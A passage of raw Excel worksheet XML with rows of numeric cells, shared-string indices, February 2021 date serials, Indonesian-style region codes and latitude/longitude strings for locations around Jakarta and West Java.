      </c>
    </row>
    <row r="3463" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3463">
        <v>263634</v>
      </c>
      <c r="B3463" s="1">
        <v>44247</v>
      </c>
      <c r="C3463" s="2">
        <v>0.49557870370370366</v>
      </c>
      <c r="D3463" t="s">
        <v>22</v>
      </c>
      <c r="E3463" t="s">
        <v>23</v>
      </c>
      <c r="F3463" t="s">
        <v>11500</v>
      </c>
      <c r="H3463" t="s">
        <v>26</v>
      </c>
      <c r="I3463" t="s">
        <v>1240</v>
      </c>
      <c r="J3463" t="s">
        <v>3135</v>
      </c>
      <c r="L3463" t="s">
        <v>11501</v>
      </c>
      <c r="M3463">
        <v>3671021007</v>
      </c>
      <c r="N3463">
        <v>3671021</v>
      </c>
      <c r="O3463">
        <v>3671</v>
      </c>
      <c r="P3463">
        <v>36</v>
      </c>
      <c r="Q3463" t="s">
        <v>454</v>
      </c>
      <c r="R3463" t="s">
        <v>454</v>
      </c>
      <c r="S3463" t="s">
        <v>201</v>
      </c>
      <c r="T3463" t="s">
        <v>171</v>
      </c>
      <c r="U3463" s="5">
        <v>10669665</v>
      </c>
      <c r="V3463" s="5" t="s">
        <v>17570</v>
      </c>
      <c r="W3463" s="5">
        <v>-621520</v>
      </c>
      <c r="X3463" t="s">
        <v>19710</v>
      </c>
      <c r="Y3463" t="str">
        <f t="shared" si="54"/>
        <v>-6.21520,106.69665</v>
      </c>
    </row>
    <row r="3464" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3464">
        <v>263635</v>
      </c>
      <c r="B3464" s="1">
        <v>44247</v>
      </c>
      <c r="C3464" s="2">
        <v>0.49586805555555552</v>
      </c>
      <c r="D3464" t="s">
        <v>22</v>
      </c>
      <c r="E3464" t="s">
        <v>23</v>
      </c>
      <c r="F3464" t="s">
        <v>11502</v>
      </c>
      <c r="G3464" t="s">
        <v>11503</v>
      </c>
      <c r="H3464" t="s">
        <v>26</v>
      </c>
      <c r="I3464" t="s">
        <v>8987</v>
      </c>
      <c r="J3464" t="s">
        <v>2485</v>
      </c>
      <c r="L3464" t="s">
        <v>11504</v>
      </c>
      <c r="M3464">
        <v>3171080001</v>
      </c>
      <c r="N3464">
        <v>3171080</v>
      </c>
      <c r="O3464">
        <v>3171</v>
      </c>
      <c r="P3464">
        <v>31</v>
      </c>
      <c r="Q3464" t="s">
        <v>2265</v>
      </c>
      <c r="R3464" t="s">
        <v>1403</v>
      </c>
      <c r="S3464" t="s">
        <v>108</v>
      </c>
      <c r="T3464" t="s">
        <v>33</v>
      </c>
      <c r="U3464" s="5">
        <v>10682953</v>
      </c>
      <c r="V3464" s="5" t="s">
        <v>17571</v>
      </c>
      <c r="W3464" s="5">
        <v>-627225</v>
      </c>
      <c r="X3464" t="s">
        <v>21305</v>
      </c>
      <c r="Y3464" t="str">
        <f t="shared" si="54"/>
        <v>-6.27225,106.82953</v>
      </c>
    </row>
    <row r="3465" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3465">
        <v>263710</v>
      </c>
      <c r="B3465" s="1">
        <v>44247</v>
      </c>
      <c r="C3465" s="2">
        <v>0.50137731481481485</v>
      </c>
      <c r="D3465" t="s">
        <v>22</v>
      </c>
      <c r="E3465" t="s">
        <v>23</v>
      </c>
      <c r="F3465" t="s">
        <v>11505</v>
      </c>
      <c r="H3465" t="s">
        <v>26</v>
      </c>
      <c r="I3465" t="s">
        <v>666</v>
      </c>
      <c r="J3465" t="s">
        <v>2627</v>
      </c>
      <c r="L3465" t="s">
        <v>11506</v>
      </c>
      <c r="M3465">
        <v>3275010012</v>
      </c>
      <c r="N3465">
        <v>3275010</v>
      </c>
      <c r="O3465">
        <v>3275</v>
      </c>
      <c r="P3465">
        <v>32</v>
      </c>
      <c r="Q3465" t="s">
        <v>2322</v>
      </c>
      <c r="R3465" t="s">
        <v>287</v>
      </c>
      <c r="S3465" t="s">
        <v>41</v>
      </c>
      <c r="T3465" t="s">
        <v>42</v>
      </c>
      <c r="U3465" s="5">
        <v>10693928</v>
      </c>
      <c r="V3465" s="5" t="s">
        <v>17572</v>
      </c>
      <c r="W3465" s="5">
        <v>-626194</v>
      </c>
      <c r="X3465" t="s">
        <v>21306</v>
      </c>
      <c r="Y3465" t="str">
        <f t="shared" si="54"/>
        <v>-6.26194,106.93928</v>
      </c>
    </row>
    <row r="3466" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3466">
        <v>263748</v>
      </c>
      <c r="B3466" s="1">
        <v>44247</v>
      </c>
      <c r="C3466" s="2">
        <v>0.50510416666666669</v>
      </c>
      <c r="D3466" t="s">
        <v>22</v>
      </c>
      <c r="E3466" t="s">
        <v>23</v>
      </c>
      <c r="F3466" t="s">
        <v>11507</v>
      </c>
      <c r="G3466" t="s">
        <v>11508</v>
      </c>
      <c r="H3466" t="s">
        <v>26</v>
      </c>
      <c r="I3466" t="s">
        <v>11509</v>
      </c>
      <c r="J3466" t="s">
        <v>2627</v>
      </c>
      <c r="L3466" t="s">
        <v>11510</v>
      </c>
      <c r="M3466">
        <v>3215031004</v>
      </c>
      <c r="N3466">
        <v>3215031</v>
      </c>
      <c r="O3466">
        <v>3215</v>
      </c>
      <c r="P3466">
        <v>32</v>
      </c>
      <c r="Q3466" t="s">
        <v>11511</v>
      </c>
      <c r="R3466" t="s">
        <v>11003</v>
      </c>
      <c r="S3466" t="s">
        <v>3979</v>
      </c>
      <c r="T3466" t="s">
        <v>42</v>
      </c>
      <c r="U3466" s="5">
        <v>10729851</v>
      </c>
      <c r="V3466" s="5" t="s">
        <v>17573</v>
      </c>
      <c r="W3466" s="5">
        <v>-632688</v>
      </c>
      <c r="X3466" t="s">
        <v>21307</v>
      </c>
      <c r="Y3466" t="str">
        <f t="shared" si="54"/>
        <v>-6.32688,107.29851</v>
      </c>
    </row>
    <row r="3467" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3467">
        <v>263823</v>
      </c>
      <c r="B3467" s="1">
        <v>44247</v>
      </c>
      <c r="C3467" s="2">
        <v>0.51153935185185184</v>
      </c>
      <c r="D3467" t="s">
        <v>22</v>
      </c>
      <c r="E3467" t="s">
        <v>23</v>
      </c>
      <c r="F3467" t="s">
        <v>11512</v>
      </c>
      <c r="G3467" t="s">
        <v>11513</v>
      </c>
      <c r="H3467" t="s">
        <v>26</v>
      </c>
      <c r="I3467" t="s">
        <v>3029</v>
      </c>
      <c r="J3467" t="s">
        <v>2627</v>
      </c>
      <c r="L3467" t="s">
        <v>11514</v>
      </c>
      <c r="M3467">
        <v>3275030004</v>
      </c>
      <c r="N3467">
        <v>3275030</v>
      </c>
      <c r="O3467">
        <v>3275</v>
      </c>
      <c r="P3467">
        <v>32</v>
      </c>
      <c r="Q3467" t="s">
        <v>11385</v>
      </c>
      <c r="R3467" t="s">
        <v>11385</v>
      </c>
      <c r="S3467" t="s">
        <v>41</v>
      </c>
      <c r="T3467" t="s">
        <v>42</v>
      </c>
      <c r="U3467" s="5">
        <v>10699194</v>
      </c>
      <c r="V3467" s="5" t="s">
        <v>17574</v>
      </c>
      <c r="W3467" s="5">
        <v>-631395</v>
      </c>
      <c r="X3467" t="s">
        <v>21308</v>
      </c>
      <c r="Y3467" t="str">
        <f t="shared" si="54"/>
        <v>-6.31395,106.99194</v>
      </c>
    </row>
    <row r="3468" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3468">
        <v>263861</v>
      </c>
      <c r="B3468" s="1">
        <v>44247</v>
      </c>
      <c r="C3468" s="2">
        <v>0.51662037037037034</v>
      </c>
      <c r="D3468" t="s">
        <v>22</v>
      </c>
      <c r="E3468" t="s">
        <v>23</v>
      </c>
      <c r="F3468" t="s">
        <v>11515</v>
      </c>
      <c r="G3468" t="s">
        <v>11516</v>
      </c>
      <c r="H3468" t="s">
        <v>26</v>
      </c>
      <c r="I3468" t="s">
        <v>117</v>
      </c>
      <c r="J3468" t="s">
        <v>2627</v>
      </c>
      <c r="L3468" t="s">
        <v>11517</v>
      </c>
      <c r="M3468">
        <v>3275060002</v>
      </c>
      <c r="N3468">
        <v>3275060</v>
      </c>
      <c r="O3468">
        <v>3275</v>
      </c>
      <c r="P3468">
        <v>32</v>
      </c>
      <c r="Q3468" t="s">
        <v>113</v>
      </c>
      <c r="R3468" t="s">
        <v>114</v>
      </c>
      <c r="S3468" t="s">
        <v>41</v>
      </c>
      <c r="T3468" t="s">
        <v>42</v>
      </c>
      <c r="U3468" s="5">
        <v>10696763</v>
      </c>
      <c r="V3468" s="5" t="s">
        <v>17575</v>
      </c>
      <c r="W3468" s="5">
        <v>-623071</v>
      </c>
      <c r="X3468" t="s">
        <v>21309</v>
      </c>
      <c r="Y3468" t="str">
        <f t="shared" si="54"/>
        <v>-6.23071,106.96763</v>
      </c>
    </row>
    <row r="3469" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3469">
        <v>263899</v>
      </c>
      <c r="B3469" s="1">
        <v>44247</v>
      </c>
      <c r="C3469" s="2">
        <v>0.51939814814814811</v>
      </c>
      <c r="D3469" t="s">
        <v>22</v>
      </c>
      <c r="E3469" t="s">
        <v>23</v>
      </c>
      <c r="F3469" t="s">
        <v>11518</v>
      </c>
      <c r="G3469" t="s">
        <v>11519</v>
      </c>
      <c r="H3469" t="s">
        <v>26</v>
      </c>
      <c r="I3469" t="s">
        <v>1394</v>
      </c>
      <c r="J3469" t="s">
        <v>2627</v>
      </c>
      <c r="L3469" t="s">
        <v>11520</v>
      </c>
      <c r="M3469">
        <v>3275060002</v>
      </c>
      <c r="N3469">
        <v>3275060</v>
      </c>
      <c r="O3469">
        <v>3275</v>
      </c>
      <c r="P3469">
        <v>32</v>
      </c>
      <c r="Q3469" t="s">
        <v>113</v>
      </c>
      <c r="R3469" t="s">
        <v>114</v>
      </c>
      <c r="S3469" t="s">
        <v>41</v>
      </c>
      <c r="T3469" t="s">
        <v>42</v>
      </c>
      <c r="U3469" s="5">
        <v>10696769</v>
      </c>
      <c r="V3469" s="5" t="s">
        <v>17576</v>
      </c>
      <c r="W3469" s="5">
        <v>-623054</v>
      </c>
      <c r="X3469" t="s">
        <v>21310</v>
      </c>
      <c r="Y3469" t="str">
        <f t="shared" si="54"/>
        <v>-6.23054,106.96769</v>
      </c>
    </row>
    <row r="3470" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3470">
        <v>263900</v>
      </c>
      <c r="B3470" s="1">
        <v>44247</v>
      </c>
      <c r="C3470" s="2">
        <v>0.52018518518518519</v>
      </c>
      <c r="D3470" t="s">
        <v>22</v>
      </c>
      <c r="E3470" t="s">
        <v>23</v>
      </c>
      <c r="F3470" t="s">
        <v>11521</v>
      </c>
      <c r="G3470" t="s">
        <v>11522</v>
      </c>
      <c r="H3470" t="s">
        <v>26</v>
      </c>
      <c r="I3470" t="s">
        <v>1240</v>
      </c>
      <c r="J3470" t="s">
        <v>4282</v>
      </c>
      <c r="M3470">
        <v>3171070005</v>
      </c>
      <c r="N3470">
        <v>3171070</v>
      </c>
      <c r="O3470">
        <v>3171</v>
      </c>
      <c r="P3470">
        <v>31</v>
      </c>
      <c r="Q3470" t="s">
        <v>218</v>
      </c>
      <c r="R3470" t="s">
        <v>121</v>
      </c>
      <c r="S3470" t="s">
        <v>108</v>
      </c>
      <c r="T3470" t="s">
        <v>33</v>
      </c>
      <c r="U3470" s="5">
        <v>10681941</v>
      </c>
      <c r="V3470" s="5" t="s">
        <v>17577</v>
      </c>
      <c r="W3470" s="5">
        <v>-623379</v>
      </c>
      <c r="X3470" t="s">
        <v>21311</v>
      </c>
      <c r="Y3470" t="str">
        <f t="shared" si="54"/>
        <v>-6.23379,106.81941</v>
      </c>
    </row>
    <row r="3471" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3471">
        <v>263938</v>
      </c>
      <c r="B3471" s="1">
        <v>44247</v>
      </c>
      <c r="C3471" s="2">
        <v>0.52283564814814809</v>
      </c>
      <c r="D3471" t="s">
        <v>22</v>
      </c>
      <c r="E3471" t="s">
        <v>23</v>
      </c>
      <c r="F3471" t="s">
        <v>11523</v>
      </c>
      <c r="H3471" t="s">
        <v>26</v>
      </c>
      <c r="I3471" t="s">
        <v>11524</v>
      </c>
      <c r="J3471" t="s">
        <v>11402</v>
      </c>
      <c r="L3471" t="s">
        <v>11525</v>
      </c>
      <c r="M3471">
        <v>3171070004</v>
      </c>
      <c r="N3471">
        <v>3171070</v>
      </c>
      <c r="O3471">
        <v>3171</v>
      </c>
      <c r="P3471">
        <v>31</v>
      </c>
      <c r="Q3471" t="s">
        <v>121</v>
      </c>
      <c r="R3471" t="s">
        <v>121</v>
      </c>
      <c r="S3471" t="s">
        <v>108</v>
      </c>
      <c r="T3471" t="s">
        <v>33</v>
      </c>
      <c r="U3471" s="5">
        <v>10682396</v>
      </c>
      <c r="V3471" s="5" t="s">
        <v>17578</v>
      </c>
      <c r="W3471" s="5">
        <v>-624304</v>
      </c>
      <c r="X3471" t="s">
        <v>21312</v>
      </c>
      <c r="Y3471" t="str">
        <f t="shared" si="54"/>
        <v>-6.24304,106.82396</v>
      </c>
    </row>
    <row r="3472" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3472">
        <v>263939</v>
      </c>
      <c r="B3472" s="1">
        <v>44247</v>
      </c>
      <c r="C3472" s="2">
        <v>0.52422453703703698</v>
      </c>
      <c r="D3472" t="s">
        <v>22</v>
      </c>
      <c r="E3472" t="s">
        <v>23</v>
      </c>
      <c r="F3472" t="s">
        <v>11526</v>
      </c>
      <c r="G3472" t="s">
        <v>11527</v>
      </c>
      <c r="H3472" t="s">
        <v>26</v>
      </c>
      <c r="I3472" t="s">
        <v>1080</v>
      </c>
      <c r="J3472" t="s">
        <v>4337</v>
      </c>
      <c r="M3472">
        <v>3171100001</v>
      </c>
      <c r="N3472">
        <v>3171100</v>
      </c>
      <c r="O3472">
        <v>3171</v>
      </c>
      <c r="P3472">
        <v>31</v>
      </c>
      <c r="Q3472" t="s">
        <v>1474</v>
      </c>
      <c r="R3472" t="s">
        <v>107</v>
      </c>
      <c r="S3472" t="s">
        <v>108</v>
      </c>
      <c r="T3472" t="s">
        <v>33</v>
      </c>
      <c r="U3472" s="5">
        <v>10681885</v>
      </c>
      <c r="V3472" s="5" t="s">
        <v>17579</v>
      </c>
      <c r="W3472" s="5">
        <v>-622238</v>
      </c>
      <c r="X3472" t="s">
        <v>21313</v>
      </c>
      <c r="Y3472" t="str">
        <f t="shared" si="54"/>
        <v>-6.22238,106.81885</v>
      </c>
    </row>
    <row r="3473" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3473">
        <v>263940</v>
      </c>
      <c r="B3473" s="1">
        <v>44247</v>
      </c>
      <c r="C3473" s="2">
        <v>0.52222222222222225</v>
      </c>
      <c r="D3473" t="s">
        <v>2648</v>
      </c>
      <c r="E3473" t="s">
        <v>23</v>
      </c>
      <c r="G3473" t="s">
        <v>11528</v>
      </c>
      <c r="H3473" t="s">
        <v>26</v>
      </c>
      <c r="J3473" t="s">
        <v>1471</v>
      </c>
      <c r="L3473" t="s">
        <v>11529</v>
      </c>
      <c r="M3473">
        <v>3171100001</v>
      </c>
      <c r="N3473">
        <v>3171100</v>
      </c>
      <c r="O3473">
        <v>3171</v>
      </c>
      <c r="P3473">
        <v>31</v>
      </c>
      <c r="Q3473" t="s">
        <v>1474</v>
      </c>
      <c r="R3473" t="s">
        <v>107</v>
      </c>
      <c r="S3473" t="s">
        <v>108</v>
      </c>
      <c r="T3473" t="s">
        <v>33</v>
      </c>
      <c r="U3473" s="5">
        <v>10681698</v>
      </c>
      <c r="V3473" s="5" t="s">
        <v>17580</v>
      </c>
      <c r="W3473" s="5">
        <v>-621929</v>
      </c>
      <c r="X3473" t="s">
        <v>21314</v>
      </c>
      <c r="Y3473" t="str">
        <f t="shared" si="54"/>
        <v>-6.21929,106.81698</v>
      </c>
    </row>
    <row r="3474" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3474">
        <v>263978</v>
      </c>
      <c r="B3474" s="1">
        <v>44247</v>
      </c>
      <c r="C3474" s="2">
        <v>0.52665509259259258</v>
      </c>
      <c r="D3474" t="s">
        <v>22</v>
      </c>
      <c r="E3474" t="s">
        <v>23</v>
      </c>
      <c r="F3474" t="s">
        <v>11530</v>
      </c>
      <c r="G3474" t="s">
        <v>11531</v>
      </c>
      <c r="H3474" t="s">
        <v>26</v>
      </c>
      <c r="I3474" t="s">
        <v>181</v>
      </c>
      <c r="J3474" t="s">
        <v>11532</v>
      </c>
      <c r="L3474" t="s">
        <v>11533</v>
      </c>
      <c r="M3474">
        <v>3171060006</v>
      </c>
      <c r="N3474">
        <v>3171060</v>
      </c>
      <c r="O3474">
        <v>3171</v>
      </c>
      <c r="P3474">
        <v>31</v>
      </c>
      <c r="Q3474" t="s">
        <v>1313</v>
      </c>
      <c r="R3474" t="s">
        <v>1236</v>
      </c>
      <c r="S3474" t="s">
        <v>108</v>
      </c>
      <c r="T3474" t="s">
        <v>33</v>
      </c>
      <c r="U3474" s="5">
        <v>10678680</v>
      </c>
      <c r="V3474" s="5" t="s">
        <v>17581</v>
      </c>
      <c r="W3474" s="5">
        <v>-624296</v>
      </c>
      <c r="X3474" t="s">
        <v>21315</v>
      </c>
      <c r="Y3474" t="str">
        <f t="shared" si="54"/>
        <v>-6.24296,106.78680</v>
      </c>
    </row>
    <row r="3475" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3475">
        <v>264101</v>
      </c>
      <c r="B3475" s="1">
        <v>44247</v>
      </c>
      <c r="C3475" s="2">
        <v>0.53498842592592599</v>
      </c>
      <c r="D3475" t="s">
        <v>22</v>
      </c>
      <c r="E3475" t="s">
        <v>23</v>
      </c>
      <c r="F3475" t="s">
        <v>11534</v>
      </c>
      <c r="G3475" t="s">
        <v>11535</v>
      </c>
      <c r="H3475" t="s">
        <v>26</v>
      </c>
      <c r="I3475" t="s">
        <v>1389</v>
      </c>
      <c r="J3475" t="s">
        <v>7171</v>
      </c>
      <c r="L3475" t="s">
        <v>11536</v>
      </c>
      <c r="M3475">
        <v>6472050006</v>
      </c>
      <c r="N3475">
        <v>6472050</v>
      </c>
      <c r="O3475">
        <v>6472</v>
      </c>
      <c r="P3475">
        <v>64</v>
      </c>
      <c r="Q3475" t="s">
        <v>7198</v>
      </c>
      <c r="R3475" t="s">
        <v>7174</v>
      </c>
      <c r="S3475" t="s">
        <v>7175</v>
      </c>
      <c r="T3475" t="s">
        <v>1308</v>
      </c>
      <c r="U3475" s="5">
        <v>11714547</v>
      </c>
      <c r="V3475" s="5" t="s">
        <v>17582</v>
      </c>
      <c r="W3475" s="5">
        <v>-47446</v>
      </c>
      <c r="X3475" t="s">
        <v>21316</v>
      </c>
      <c r="Y3475" t="str">
        <f t="shared" si="54"/>
        <v xml:space="preserve"> -0.47446,117.14547</v>
      </c>
    </row>
    <row r="3476" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3476">
        <v>264102</v>
      </c>
      <c r="B3476" s="1">
        <v>44247</v>
      </c>
      <c r="C3476" s="2">
        <v>0.53497685185185184</v>
      </c>
      <c r="D3476" t="s">
        <v>22</v>
      </c>
      <c r="E3476" t="s">
        <v>23</v>
      </c>
      <c r="F3476" t="s">
        <v>11537</v>
      </c>
      <c r="G3476" t="s">
        <v>11538</v>
      </c>
      <c r="H3476" t="s">
        <v>26</v>
      </c>
      <c r="I3476" t="s">
        <v>1513</v>
      </c>
      <c r="J3476" t="s">
        <v>846</v>
      </c>
      <c r="M3476">
        <v>3174070002</v>
      </c>
      <c r="N3476">
        <v>3174070</v>
      </c>
      <c r="O3476">
        <v>3174</v>
      </c>
      <c r="P3476">
        <v>31</v>
      </c>
      <c r="Q3476" t="s">
        <v>621</v>
      </c>
      <c r="R3476" t="s">
        <v>84</v>
      </c>
      <c r="S3476" t="s">
        <v>32</v>
      </c>
      <c r="T3476" t="s">
        <v>33</v>
      </c>
      <c r="U3476" s="5">
        <v>10673667</v>
      </c>
      <c r="V3476" s="5" t="s">
        <v>17583</v>
      </c>
      <c r="W3476" s="5">
        <v>-616749</v>
      </c>
      <c r="X3476" t="s">
        <v>21317</v>
      </c>
      <c r="Y3476" t="str">
        <f t="shared" si="54"/>
        <v>-6.16749,106.73667</v>
      </c>
    </row>
    <row r="3477" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3477">
        <v>264103</v>
      </c>
      <c r="B3477" s="1">
        <v>44247</v>
      </c>
      <c r="C3477" s="2">
        <v>0.53498842592592599</v>
      </c>
      <c r="D3477" t="s">
        <v>22</v>
      </c>
      <c r="E3477" t="s">
        <v>23</v>
      </c>
      <c r="F3477" t="s">
        <v>11539</v>
      </c>
      <c r="G3477" t="s">
        <v>11540</v>
      </c>
      <c r="H3477" t="s">
        <v>26</v>
      </c>
      <c r="I3477" t="s">
        <v>11541</v>
      </c>
      <c r="J3477" t="s">
        <v>2916</v>
      </c>
      <c r="L3477" t="s">
        <v>11542</v>
      </c>
      <c r="M3477">
        <v>3172040003</v>
      </c>
      <c r="N3477">
        <v>3172040</v>
      </c>
      <c r="O3477">
        <v>3172</v>
      </c>
      <c r="P3477">
        <v>31</v>
      </c>
      <c r="Q3477" t="s">
        <v>552</v>
      </c>
      <c r="R3477" t="s">
        <v>281</v>
      </c>
      <c r="S3477" t="s">
        <v>49</v>
      </c>
      <c r="T3477" t="s">
        <v>33</v>
      </c>
      <c r="U3477" s="5">
        <v>10688138</v>
      </c>
      <c r="V3477" s="5" t="s">
        <v>17584</v>
      </c>
      <c r="W3477" s="5">
        <v>-626275</v>
      </c>
      <c r="X3477" t="s">
        <v>21318</v>
      </c>
      <c r="Y3477" t="str">
        <f t="shared" si="54"/>
        <v>-6.26275,106.88138</v>
      </c>
    </row>
    <row r="3478" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3478">
        <v>264142</v>
      </c>
      <c r="B3478" s="1">
        <v>44247</v>
      </c>
      <c r="C3478" s="2">
        <v>0.53591435185185188</v>
      </c>
      <c r="D3478" t="s">
        <v>22</v>
      </c>
      <c r="E3478" t="s">
        <v>23</v>
      </c>
      <c r="F3478" t="s">
        <v>11543</v>
      </c>
      <c r="G3478" t="s">
        <v>11544</v>
      </c>
      <c r="H3478" t="s">
        <v>26</v>
      </c>
      <c r="I3478" t="s">
        <v>1000</v>
      </c>
      <c r="J3478" t="s">
        <v>11545</v>
      </c>
      <c r="L3478" t="s">
        <v>11546</v>
      </c>
      <c r="M3478">
        <v>3171010006</v>
      </c>
      <c r="N3478">
        <v>3171010</v>
      </c>
      <c r="O3478">
        <v>3171</v>
      </c>
      <c r="P3478">
        <v>31</v>
      </c>
      <c r="Q3478" t="s">
        <v>6888</v>
      </c>
      <c r="R3478" t="s">
        <v>264</v>
      </c>
      <c r="S3478" t="s">
        <v>108</v>
      </c>
      <c r="T3478" t="s">
        <v>33</v>
      </c>
      <c r="U3478" s="5">
        <v>10684206</v>
      </c>
      <c r="V3478" s="5" t="s">
        <v>17585</v>
      </c>
      <c r="W3478" s="5">
        <v>-629715</v>
      </c>
      <c r="X3478" t="s">
        <v>21319</v>
      </c>
      <c r="Y3478" t="str">
        <f t="shared" si="54"/>
        <v>-6.29715,106.84206</v>
      </c>
    </row>
    <row r="3479" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3479">
        <v>264143</v>
      </c>
      <c r="B3479" s="1">
        <v>44247</v>
      </c>
      <c r="C3479" s="2">
        <v>0.5376967592592593</v>
      </c>
      <c r="D3479" t="s">
        <v>22</v>
      </c>
      <c r="E3479" t="s">
        <v>23</v>
      </c>
      <c r="F3479" t="s">
        <v>11547</v>
      </c>
      <c r="H3479" t="s">
        <v>26</v>
      </c>
      <c r="I3479" t="s">
        <v>1909</v>
      </c>
      <c r="J3479" t="s">
        <v>846</v>
      </c>
      <c r="L3479" t="s">
        <v>11548</v>
      </c>
      <c r="M3479">
        <v>3174070002</v>
      </c>
      <c r="N3479">
        <v>3174070</v>
      </c>
      <c r="O3479">
        <v>3174</v>
      </c>
      <c r="P3479">
        <v>31</v>
      </c>
      <c r="Q3479" t="s">
        <v>621</v>
      </c>
      <c r="R3479" t="s">
        <v>84</v>
      </c>
      <c r="S3479" t="s">
        <v>32</v>
      </c>
      <c r="T3479" t="s">
        <v>33</v>
      </c>
      <c r="U3479" s="5">
        <v>10673814</v>
      </c>
      <c r="V3479" s="5" t="s">
        <v>17586</v>
      </c>
      <c r="W3479" s="5">
        <v>-616735</v>
      </c>
      <c r="X3479" t="s">
        <v>21320</v>
      </c>
      <c r="Y3479" t="str">
        <f t="shared" si="54"/>
        <v>-6.16735,106.73814</v>
      </c>
    </row>
    <row r="3480" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3480">
        <v>264144</v>
      </c>
      <c r="B3480" s="1">
        <v>44247</v>
      </c>
      <c r="C3480" s="2">
        <v>0.53907407407407404</v>
      </c>
      <c r="D3480" t="s">
        <v>22</v>
      </c>
      <c r="E3480" t="s">
        <v>23</v>
      </c>
      <c r="F3480" t="s">
        <v>11549</v>
      </c>
      <c r="G3480" t="s">
        <v>11550</v>
      </c>
      <c r="H3480" t="s">
        <v>26</v>
      </c>
      <c r="I3480" t="s">
        <v>11551</v>
      </c>
      <c r="J3480" t="s">
        <v>11552</v>
      </c>
      <c r="M3480">
        <v>3171070005</v>
      </c>
      <c r="N3480">
        <v>3171070</v>
      </c>
      <c r="O3480">
        <v>3171</v>
      </c>
      <c r="P3480">
        <v>31</v>
      </c>
      <c r="Q3480" t="s">
        <v>218</v>
      </c>
      <c r="R3480" t="s">
        <v>121</v>
      </c>
      <c r="S3480" t="s">
        <v>108</v>
      </c>
      <c r="T3480" t="s">
        <v>33</v>
      </c>
      <c r="U3480" s="5">
        <v>10681753</v>
      </c>
      <c r="V3480" s="5" t="s">
        <v>17587</v>
      </c>
      <c r="W3480" s="5">
        <v>-623363</v>
      </c>
      <c r="X3480" t="s">
        <v>19074</v>
      </c>
      <c r="Y3480" t="str">
        <f t="shared" si="54"/>
        <v>-6.23363,106.81753</v>
      </c>
    </row>
    <row r="3481" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3481">
        <v>264259</v>
      </c>
      <c r="B3481" s="1">
        <v>44247</v>
      </c>
      <c r="C3481" s="2">
        <v>0.54861111111111105</v>
      </c>
      <c r="D3481" t="s">
        <v>22</v>
      </c>
      <c r="E3481" t="s">
        <v>23</v>
      </c>
      <c r="F3481" t="s">
        <v>11553</v>
      </c>
      <c r="H3481" t="s">
        <v>26</v>
      </c>
      <c r="I3481" t="s">
        <v>137</v>
      </c>
      <c r="J3481" t="s">
        <v>2627</v>
      </c>
      <c r="L3481" t="s">
        <v>11554</v>
      </c>
      <c r="M3481">
        <v>3275060003</v>
      </c>
      <c r="N3481">
        <v>3275060</v>
      </c>
      <c r="O3481">
        <v>3275</v>
      </c>
      <c r="P3481">
        <v>32</v>
      </c>
      <c r="Q3481" t="s">
        <v>146</v>
      </c>
      <c r="R3481" t="s">
        <v>114</v>
      </c>
      <c r="S3481" t="s">
        <v>41</v>
      </c>
      <c r="T3481" t="s">
        <v>42</v>
      </c>
      <c r="U3481" s="5">
        <v>10696904</v>
      </c>
      <c r="V3481" s="5" t="s">
        <v>17588</v>
      </c>
      <c r="W3481" s="5">
        <v>-623157</v>
      </c>
      <c r="X3481" t="s">
        <v>21321</v>
      </c>
      <c r="Y3481" t="str">
        <f t="shared" si="54"/>
        <v>-6.23157,106.96904</v>
      </c>
    </row>
    <row r="3482" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3482">
        <v>264298</v>
      </c>
      <c r="B3482" s="1">
        <v>44247</v>
      </c>
      <c r="C3482" s="2">
        <v>0.55270833333333336</v>
      </c>
      <c r="D3482" t="s">
        <v>22</v>
      </c>
      <c r="E3482" t="s">
        <v>23</v>
      </c>
      <c r="F3482" t="s">
        <v>11555</v>
      </c>
      <c r="H3482" t="s">
        <v>26</v>
      </c>
      <c r="I3482" t="s">
        <v>792</v>
      </c>
      <c r="J3482" t="s">
        <v>118</v>
      </c>
      <c r="L3482" t="s">
        <v>11556</v>
      </c>
      <c r="M3482">
        <v>3171070001</v>
      </c>
      <c r="N3482">
        <v>3171070</v>
      </c>
      <c r="O3482">
        <v>3171</v>
      </c>
      <c r="P3482">
        <v>31</v>
      </c>
      <c r="Q3482" t="s">
        <v>120</v>
      </c>
      <c r="R3482" t="s">
        <v>121</v>
      </c>
      <c r="S3482" t="s">
        <v>108</v>
      </c>
      <c r="T3482" t="s">
        <v>33</v>
      </c>
      <c r="U3482" s="5">
        <v>10681019</v>
      </c>
      <c r="V3482" s="5" t="s">
        <v>17589</v>
      </c>
      <c r="W3482" s="5">
        <v>-625544</v>
      </c>
      <c r="X3482" t="s">
        <v>21322</v>
      </c>
      <c r="Y3482" t="str">
        <f t="shared" si="54"/>
        <v>-6.25544,106.81019</v>
      </c>
    </row>
    <row r="3483" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3483">
        <v>264337</v>
      </c>
      <c r="B3483" s="1">
        <v>44247</v>
      </c>
      <c r="C3483" s="2">
        <v>0.55524305555555553</v>
      </c>
      <c r="D3483" t="s">
        <v>22</v>
      </c>
      <c r="E3483" t="s">
        <v>23</v>
      </c>
      <c r="F3483" t="s">
        <v>11557</v>
      </c>
      <c r="H3483" t="s">
        <v>26</v>
      </c>
      <c r="I3483" t="s">
        <v>974</v>
      </c>
      <c r="J3483" t="s">
        <v>930</v>
      </c>
      <c r="L3483" t="s">
        <v>11558</v>
      </c>
      <c r="M3483">
        <v>3174070002</v>
      </c>
      <c r="N3483">
        <v>3174070</v>
      </c>
      <c r="O3483">
        <v>3174</v>
      </c>
      <c r="P3483">
        <v>31</v>
      </c>
      <c r="Q3483" t="s">
